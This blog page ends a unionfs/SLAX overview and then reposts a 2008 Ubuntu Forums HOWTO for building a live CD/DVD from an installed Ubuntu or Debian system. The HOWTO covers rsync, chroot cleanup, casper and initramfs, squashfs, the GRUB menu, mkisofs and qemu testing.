WHITEOUT mode is used as default. Copy-up is a special method used to handle file modifications in union. A file from ro branch can't be modified, so it is copied to upper (left) read-write branch at the time when the modification should begin. Then the modification is possible and modified file remains in rw branch.

To add a rw branch at the top of union in our example, type

$ unionctl /mnt/union --add --before /mnt/cdrom1 --mode rw /mnt/changes

All the changes will be stored in /mnt/changes and the union will look like this:

/mnt/changes (rw)
/mnt/cdrom1 (r-)
/mnt/cdrom2 (r-)
/mnt/cdrom3 (r-)


Practical unionfs application - SLAX

Data stored on a read-only medium like CD-ROM can't be modified. A Live CD Linux distribution, which is offering full write support to all directories, needs to use special techniques to allow virtual modifications and to save all changes in memory. SLAX is using these techniques for very long time, starting at the end of 2003 with ovlfs and implementing unionfs at the end of 2004. SLAX 5, released in April 2005, can give you an impression of what miracles could be, thanks to unionfs, created.


Links
- Stony Brook university: http://www.fsl.cs.sunysb.edu/
- UnionFS: http://www.fsl.cs.sunysb.edu/project-unionfs.html
- SLAX: http://www.slax.org
- Linux Live scripts: http://www.linux-live.org
- Linux kernel: http://www.kernel.org

Monday, July 14, 2008

Live CD From Your In Installation / Running System - Ubuntu - Hard Way

Transforming your Installation into a Live DVD/CD


José Oliveira: I tested this tutorial on Ubuntu 8.04 Hardy Heron using the method without using de debootstrap, and it worked like a charm, my only work was copying the commands from tutorial and paste them in the bash shell :).


This HOWTO is about making a live CD/DVD from the main system on your hard drive. This might be desired if you have customized your system and want to have it on CD.

Another approach that will be discussed here is building your live CD/DVD from scratch. This will be done by building a new system using debootstrap. This is usefull if you want to build a clean live CD, or if you want to build a minimal rescue cd. (Consult Appendix.2 for more details about building a CD from scratch).

The live CD is usually created with a filesystem called squashfs. Squashfs is read only compressed filesystem that allow us to squeeze our system into a single CD. Note that your system has to be about 2GB (this might need some trial an error) to produce a compressed image that fits on the CD.




Background on live CD/DVD

Note: This section is a clarification of how live CD works. You don't have to read it. You can skip it if you want.

A live CD/DVD is basically a normal linux installation just like an ordinary harddrive installation. However, simply copying the harddirve installation over to a CD/DVD is not enough to produce a working system. Why? because there are still minor differences between a live CD/DVD and on ordinary harddrive installation. So in addition to copying our harddirve installation to the CD/DVD we must address those differences as well.

So what are these differences?
  1. The CD or DVD is read only media. Linux needs to have write access to certain parts of the system to be able to operate properly (like "/dev" "/proc" "/var" "/tmp"). There are a lot of approaches to address this problem. All of which utilize the system RAM. Some of these approaches enable write access only to essential directories and files, and hence, they do not allow the user to modify the system or install new packages while in the live CD. Other approaches, like unionfs which is what is used in this guide, allows the user to write to any part of the system. This is done by merging part of the RAM with the read-only filesystem of the live CD/DVD and making the look like one filesystem that have read-write access. Unionfs has to be mounted at boot in a certain manner.


  2. With the harddrive installation the location of the root filesystem is fixed. So it is passed to the kernel at boot time using the root=/dev/... parameter. With a live CD/DVD, the location of the root device is not fixed as the user might have multiple cdrom drives, these drives can be ide, scsi ... etc. So for the root filesystem to be mounted, there must be a way to identify the root device, and then we have to load the suitable kernel modules (to be able to access the cdrom controller as well as the CD filesystem). All this has to be done even before we have a root filesystem mounted.



  3. To fit on a CD, the filesystem is usually compressed using squashfs. So we need to autodetect the filesystem type. We also need to have the proper modules for mounting it.




These considerations require special preparation at boot time, some of which must be performed even before mounting the actual filesystem. How can we do this?

Linux introduced a mechanism that allow for such preparations at boot time before the actual root filesystem is mounted. It is called the initial root filesystem or initramfs. This mechanism is used also in mounting normal harddirve installations, as it adds flexibilty to the boot process.


initramfs is virtual filesystem. It is a compressed cpio (cpio is an archive format similar to tar) archive that contains a minimal shell, kernel modules necessary for mounting the root filesystem and number of scripts that perform some tasks at boot time. The most important of these scripts is a script called init located at the root of the initramfs.

How does initramfs work?

The boot loader loads both the kernel and the initramfs into memory and starts the kernel. The kernel then unpacks the initramfs and mount it as initial root filesystem, and then looks for the init program within the initial filesystem, and once it finds it, it executes it and hand the boot process over to it. This init scirpt is responsible for finding the real root filesystem and mounting it. It is also responsible for any special preparations required at boot time.

So any special operations required for booting the system from live media can be coded into the initramfs boot scripts.

How is initramfs is created?

We do not have to create initramfs manually (although it can be done). There are tools for creating and updating initramfs like the command update-initramfs. Moreover, these tools can include custom scripts into the initramfs if they are placed in a certain preset locations (/usr/share/initramfs/scripts). So all we have to do is dump our custom scripts (which will do all the required preparation for booting the live CD/DVD) into these preset locations, and then create a custom initramfs by running update-initramfs.

We don't even have to write these scripts. Why? becuase there are packages that have scripts tailored for booting form live CDs. One of these packages is called casper (this is the package used in this howto). By installing casper into the system, it places the scripts in there proper locations (where they can be spotted by update-initrfamfs). The only thing we need to do after installing casper is running update-initramfs to create an initramfs suitable for live CD/DVD.



The live CD/DVD structure:

The directory tree of the live CD/DVD we are going to create is going to look like this:

Code:

(CD ROOT)
|-------+casper
| |-------filesystem.${FORMAT}
| |-------filesystem.manifest
| |-------filesystem.manifest-desktop
|
|-------+boot
| |--------+grub
| | |--------menu.lst
| | |--------stage2_eltorito
| |
| |-------vmlinuz
| |-------initrd.gz
| |-------memtest86+
|
|--------md5sum.txt

  • /casper/filesystem.${FORMAT}: This is the container of the linux filesystem we are going to copy from our harddisk. It is usually a compressed filesystem like squahsfs.
  • /casper/filesystem.manifest: This file is optional. You only need it if you decide to include the Ubuntu installer in the CD. The purpose of this file will be explained later.
  • /casper/filesystem.manifest-desktop: This file is optional. You only need it if you decide to include the Ubuntu installer in the CD. The purpose of this file will be explained later.
  • /boot/grub/menu.lst: File containing boot options for the live CD/DVD.
  • /boot/grub/stage2_eltorito: The boot loader of the CD. (stage2 of grub).
  • /boot/vmlinuz: The linux kernel. This is copied form the linux filesystem.
  • /boot/initrd.gz: the initramfs that contain the customizations necessary for the live CD/DVD.
  • /boot/memtest86+: Optional file used to test the RAM of the machine form the live CD/DVD.
  • /md5sum.txt: Optional file containing checksums for all the files in the CD.



What you need:
  • A working Debian or Ubuntu machine with internet access.
  • CD/DVD Writer.
  • Enough space in your harddirve. At least two times as much space as your installation size.


Outline of the steps:

A. Prepare Our work environment.

B. Copy the Source system to the target directory.
Note: People building a live CD/DVD from scratch using debootstrap: This step and replaced with the instructions listed here.

C. Chroot into the new system and make some modifications.

D. Prepare The CD directory tree.

E. Build the CD/DVD

Appendix 1. Adapting this guide to Debian.
Appendix 2. Building the live media form scratch using Debootstrap.


Conventions used in this HOWTO:
  • Text highlighted in Magenta is meant to be replaced by the user's custom value.
  • Commands performed within a chroot will be in Blue.
  • Optional arguments or steps will be highlighted in Gray.
  • Special notes and instructions for people building a live CD/DVD from scratch using debootstrap are highlighted in Green
  • I will use gedit as my default text editor. Replace gedit with your favorite text editor.

A. Preparing the environment

1. Set some variables

Code:

export WORK=~/work
export CD=~/cd
export FORMAT=squashfs
export FS_DIR=casper


The WORK Directory is where our temporary files and mount point will reside.
The CD is the location of the CD tree.
FORMAT is the filesystem type. We you are going to use a compressed squashfs
FS_DIR is the location of the actual filesystem image within the cd tree.

Replace only the values highlighted in Magenta.


2. Create the CD and the WORK directory structure:

Code:

sudo mkdir -p ${CD}/{${FS_DIR},boot/grub} ${WORK}/rootfs



3. Install some packages on your current system:

Code:

sudo apt-get update


Code:

sudo apt-get install mkisofs grub squashfs-tools linux-ubuntu-modules-$(uname -r) qemu


qemu is optional. It is only needed for testing the cd before burning it. It can be substituted with any other virtualization software like virtualbox.

linux-ubuntu-modules-$(uname -r) is only needed for Ubuntu Gutsy and later. If using an Ubuntu version prior to Gutsy omit this package as it is part of the main kerenl package.


B. Copy your installation into the new filesystem.

Note: People building a live CD/DVD from scratch using debootstrap: skip this step and replace it with the instructions listed here.

Code:

sudo rsync -av --one-file-system --exclude=/proc/* --exclude=/dev/*\
--exclude=/sys/* --exclude=/tmp/* --exclude=/home/*\
--exclude=/lost+found / ${WORK}/rootfs


Note: rsync is used instead of cp to take advantage of the --one-file-system and the --exclude options.


If you have a separate boot partition you will have to copy it using the following command:

Code:

sudo cp -av /boot/* ${WORK}/rootfs/boot



(Optional) Copy settings in your home dir:


If you want to preseve your user account settings which are stored in your home directory, you can copy them to ${WORK}/rootfs/etc/skel/.

But first we have to define what files we want to copy. For example I am using xcfe4 as my DE, and it stores all it settings in a directory called .config in my home directory, so I am going to add .config to the variable $CONFIG:

Code:

CONFIG='.config .bashrc'

Now, Copy the CONFIG files using the following command:

Code:

cd ~ && for i in $CONFIG
do
sudo cp -rpv --parents $i ${WORK}/rootfs/etc/skel
done


C. Chroot into the new system and modify it:

1. Chroot into the copied system after mounting proc and dev:

Note: People building a live CD/DVD from scratch using debootstrap: skip this step.

Code:

sudo mount -o bind /dev/ ${WORK}/rootfs/dev


Code:

sudo mount -t proc proc ${WORK}/rootfs/proc


Code:

sudo chroot ${WORK}/rootfs /bin/bash

N.B: All commands in Blue are done within a chroot.

Now you are within chroot environment, type the following command:

Code:

LANG=



Note: People building a live CD/DVD from scratch using debootstrap: Resume the steps of the guide here.


2. Install Packages Essential for live CD:


Code:

apt-get update


Code:

apt-get install casper discover1 xresprobe


casper contain the live scirpts.
discover1 & xresprobe are used for autodetectin hardware at startup.


3. (Optional) If you want your live cd to have an installer, install the Ubuntu installer:

Code:

apt-get install ubiquity


Note: People using kde replace replace the previous command with

Code:

apt-get install ubiquity ubiquity-frontend-kde


Credit for this goes note to Fragadelic author of remastersys. Remastersys.



(Optional Step)Install any packages you want to be in the CD. Some of the following packages are useful in emergency situations:

Code:

sudo apt-get install gparted ms-sys testdisk wipe partimage xfsprogs reiserfsprogs jfsutils ntfs-3g ntfsprogs dosfstools mtools


gparted: patitioning tool. It is automatically installed as a dependecy of ubiquity.
ms-sys: writing a Microsoft compatible boot record (MBR).
testdisk: Partition scanner and disk recovery tool.
wipe: Secure file deletion.
partimage: backup partitions into a compressed image file (like norton ghost).
xfsprogs reiserfsprogs jfsutils: Tools for handling different filesystems.
mtools: Tools for manipulating MSDOS files



Note: People building a live CD/DVD from scratch using debootstrap: Additional step right here. Look in appendix.2 for details.



4. Update the initramfs:

Note: People building a live CD/DVD from scratch using debootstrap: Commands in this step are to be modified. Look in appendix.2 for details.


First update modules.dep:

Code:

depmod -a $(uname -r)

Code:

update-initramfs -u -k $(uname -r)


As already metioned above, the initramfs is reponsible for much of the preparation required at the boot time of the CD/DVD. The updated initramfs now contain the live scirpts installed with casper.


5. Delete these files.

Code:

for i in "/etc/hosts /etc/hostname /etc/resolv.conf /etc/timezone /etc/fstab /etc/mtab /etc/shadow /etc/shadow- /etc/gshadow /etc/gshadow- /etc/gdm/gdm-cdd.conf /etc/gdm/gdm.conf-custom /etc/X11/xorg.conf /boot/grub/menu.lst /boot/grub/device.map"
do
rm $i
done 2>/dev/null


These files are not needed in the CD/DVD. some of them are could interfer with the CD/DVD boot process. (e.g. shadow and gdm.conf-custom can interfere with autologin).


6. Clean apt cache

Code:

apt-get clean


7. Clean some dirs and files:

Code:

rm -r /tmp/* /root/* 2>/dev/null


Code:

rm /boot/*.bak 2>/dev/null


8. Remove non system users

Note: People building a live CD/DVD from scratch using debootstrap: skip this step.

Code:

for i in `cat /etc/passwd | awk -F":" '{print $1}'`
do
uid=`cat /etc/passwd | grep "^${i}:" | awk -F":" '{print $3}'`
[ "$uid" -gt "999" -a "$uid" -ne "65534" ] && userdel --force ${i} 2>/dev/null
done

Non-system users are users created by you that have user id more than 999.


9. Clean the chroot environment form unnecessary files:

Note: People building a live CD/DVD from scratch using debootstrap: skip this step.

Code:

find /var/run /var/log /var/mail /var/spool /var/lock /var/backups /var/tmp -type f -exec rm {} \;



10. If you are using GDM recreate it's config file:

Note: People building a live CD/DVD from scratch using debootstrap: skip this step.

Code:

[ -f "/etc/gdm/factory-gdm.conf" ] && cp -f /etc/gdm/factory-gdm.conf /etc/gdm/gdm.conf 2>/dev/null


Sometimes a customized /etc/gdm/gdm.conf can interfere with the live CD/DVD autologin.



11. Create some files in /var/log:

Note: People building a live CD/DVD from scratch using debootstrap: skip this step.

Code:

for i in dpkg.log lastlog mail.log syslog auth.log daemon.log faillog lpr.log mail.warn user.log boot debug mail.err messages wtmp bootstrap.log dmesg kern.log mail.info
do
touch /var/log/${i}
done



Most of these files are log files that have been cleaned in step 7. We created an empty files in their place to prevent the system from complaining at boot.


12. Exit chroot

Code:

exit



D. Prepare The CD directory tree:

1. Copy the kernel, the updated initrd and memtest prepared in the chroot:

Note: People building a live CD/DVD from scratch using debootstrap: Commands in this step are to be modified. Look in appendix.2 for details.

Code:

sudo cp -vp ${WORK}/rootfs/boot/vmlinuz-$(uname -r) ${CD}/boot/vmlinuz


Code:

sudo cp -vp ${WORK}/rootfs/boot/initrd.img-$(uname -r) ${CD}/boot/initrd.gz


Code:

sudo cp -vp ${WORK}/rootfs/boot/memtest86+.bin ${CD}/boot


2. Generate manifest:

Note: This step is only needed if you installed the Ubuntu installer ubiquity. This step generates two files (filesystem.manifest & filesystem.manifest-desktop).


Code:

sudo chroot ${WORK}/rootfs dpkg-query -W --showformat='${Package} ${Version}\n' | sudo tee ${CD}/${FS_DIR}/filesystem.manifest


Code:

sudo cp -v ${CD}/${FS_DIR}/filesystem.manifest{,-desktop}


Code:

REMOVE='ubiquity casper user-setup discover1 xresprobe os-prober libdebian-installer4'


Code;

for i in $REMOVE
do
sudo sed -i "/${i}/d" ${CD}/${FS_DIR}/filesystem.manifest-desktop
done


These two files are used by the ubiquity installer when installing to harddisk. These two files are just lists of packages. Ubiquity compares these two files and removes packages unique to filesystem.manifest. This way when installing to harddisk, packages like casper which is only useful in a live CD/DVD are removed. These packages that will be removed at install are defined in the variable $REMOVE


3. Unmount bind mounted dirs:


Code:

sudo umount ${WORK}/rootfs/proc


Code:

sudo umount ${WORK}/rootfs/sys


Code:

sudo umount ${WORK}/rootfs/dev




4. Convert the directory tree into a squashfs:

Code:

sudo mksquashfs ${WORK}/rootfs ${CD}/${FS_DIR}/filesystem.${FORMAT}


Note: Make sure the resulting file size can fit into your live media.


Note: Compression might incur a slight performace penalty. If you are using DVD and your overall system size is less than 4GB you don't have to use compression, instead you can use squashfs without compression by adding the -noI -noD -noF switches to mksquashfs.



5. Make Grub the bootloader of the CD

Copy grub file:


Code:

sudo find /boot /usr/lib/grub/ -iname 'stage2_eltorito' -exec cp -v {} ${CD}/boot/grub \;



Make the menu.lst

Code:

sudo gedit ${CD}/boot/grub/menu.lst



Copy the following text into it and save it.

Code:

# By default, boot the first entry.
default 0

# Boot automatically after 30 secs.
timeout 30

color cyan/blue white/blue


title Start Linux in Graphical Mode
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet splash
initrd /boot/initrd.gz

title Start Linux in Safe Graphical Mode
kernel /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet splash
initrd /boot/initrd.gz

title Start Linux in Text Mode
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd /boot/initrd.gz

title Start Presistent Live CD
kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet splash
initrd /boot/initrd.gz

title Start Linux Graphical Mode from RAM
kernel /boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet splash
initrd /boot/initrd.gz

title Memory Test
kernel /boot/memtest86+.bin

title Boot the First Hard Disk
root (hd0)
chainloader +1



6. Calculate MD5

Code:

cd $CD && find . -type f -print0 | xargs -0 sudo md5sum | sudo tee ${CD}/md5sum.txt




E. Build the CD/DVD

1. Make the ISO file

Code:

sudo mkisofs -b boot/grub/stage2_eltorito \
-no-emul-boot -boot-load-size 4 -boot-info-table \
-V "Custom Live CD" -cache-inodes -r -J -l \
-o ~/live-cd.iso $CD



2. Test the CD

Test using qemu emulator

Code:

qemu -cdrom ~/live-cd.iso -boot d


Or use any other virtualization program you like.


Update: As noted by az in this post, while testing the iso with qemu sometimes it drops you to an initramfs shell because of a problem with qemu. This behaviour has been confirmed by other users. In this case it is advisable to retest the iso with another virtualization software like virtualbox or to burn the iso to REWRITABLE cd and test directly on your pc.


3. (Optional) Clean our workspace

Code:

[ -d "$WORK" ] && rm -r $WORK $CD




Final Notes:



  • If you are using a custom kernel make sure it has support for the following:

    1. Support of loopback device.
    2. Support for the filesystem format you are using (e.g. squashfs ).
    3. Support for unionfs.
    4. Support for initramfs.


  • There are some extra options I put in the grub menu. The ones that I have not tried are highlighted in Red below:


    1. Start linux form RAM. This option is only possible if your ram is larger than data on the live media. This option can be useful if you are building a minimal command line rescue disc as it would enhance performance to start it from RAM.

    2. Start in presistent mode. To learn about it more look here.

    3. Start Linux in Text Mode. This will not start X. The user will be autologged into a virtual terminal (the kind of terminal you get when you press Alt+Ctrl+F1). Note that this option will not work in all Ubuntu versions prior to Gutsy.




Appendix 1. Adapting this guide to Debian

This guide can be modified to apply to Debian systems as well. There are number of differeces between Ubuntu and Debian that we must take into account:

  1. As of Debian lenny, casper is deprecated and replaced with live-initramfs. live-initramfs is a fork of casper and it has the same options, with one difference in the CD directory tree sturcute. This can be solved by setting the variable FS_DIR=live instead of FS_DIR=casper.
  2. Sqaushfs modules and unionfs modules are in two separate packages.
  3. Ubiquity installer is not present in the Debain repositories. Ubiquity is only needed if you intend to install Linux from the live CD/DVD to the harddisk. I have not tried using ubiquity on Debian so I am not sure if it will work. To install it on Debian you have to add Ubuntu main repository to your sources.list.

So in light of the points mentioned above we have to make the following modifications to adapt the guide to Debian:
In step A.1 replace FS_DIR=casper with


Code:

FS_DIR=live


Replace the command in Step A.3 with:

Code:

sudo apt-get install mkisofs grub squashfs-tools squashfs-modules-$(uname -r) qemu


Replace the command in Step C.2 with:

Code:

apt-get install live-initramfs unionfs-modules-$(uname -r) discover1 xresprobe


Skip step C.3 and D.2 if you do not intend to try ubiquity on Debian.

In Step D.5 Replace every occurence of BOOT=casper and boot=casper in menu.lst with BOOT=live and boot=live respectively




Appendix 2. Building the live media form scratch using debootstrap.

Instead of using your current installation to be the basis of you live CD, you can build a custom system from scratch into any directory in your system using debootstrap, and then use that as the basis of your CD. The modifications you have to make are:

  • skip step B alltogether. Instead, do the instructions listed here to build your custom system from scratch using debootstarp
  • after finishing the instructions of the guide mentioned above, you resume the steps in this guide, going straight to step C.2 (skip step C.1).

Before step C.4 set the following variable:

Code:

export kversion=`cd /boot && ls vmlinuz-* | sed 's@vmlinuz-@@'`


Modify the two commands in step C.4 so they look lik this:

Code:

depmod -a ${kversion}


Code:

update-initramfs -u -k ${kversion}



Skip the following steps: C8, C9, C10, C11

Modify the commands in Step D.1 as follows:


Code:

find ${WORK}/rootfs/boot -iname 'vmlinuz*' -exec sudo cp -vp {} ${CD}/boot/vmlinuz \;


Code:

find ${WORK}/rootfs/boot -iname 'initrd.img*' -exec sudo cp -vp {} ${CD}/boot/initrd.gz \;


Code:

sudo cp -vp ${WORK}/rootfs/boot/memtest86+.bin ${CD}/boot


dit (1): 20/02/08
  1. Added Suggestions for packages useful in rescue CD.
  2. Modified step D.5 as per RumorsOfWar suggestion.


Update (2): 14/03/08

Fragadelic kindly posted this guide on his website. Fragadelic is the author of remastersys. Remastersys is a tool that can create a live CD/DVD in an automated manner as opposed to the step by step nature of this guide. Another advantage of remastersys is that it has a GUI for those who do not want to miss with the command line.


Edit (3): 12/04/08
Correcting a typo in step E.2 as pointed out by vbgeek


Edit (4): 21/04/08
Removed live-initramfs from the variable REMOVE (in step D.2) as pointed out by gjhicks


Edit (5): 05/05/08
Removed the appendix of how to make the cd using a unix filesystem like ext2. This is now obsolete as you can use squashfs without compression by adding the -noI -noD -noF switches to mksquashfs.

Last edited by capink; May 13th, 2008 at 07:27 AM.


Taken From: http://ubuntuforums.org/showthread.php?t=688872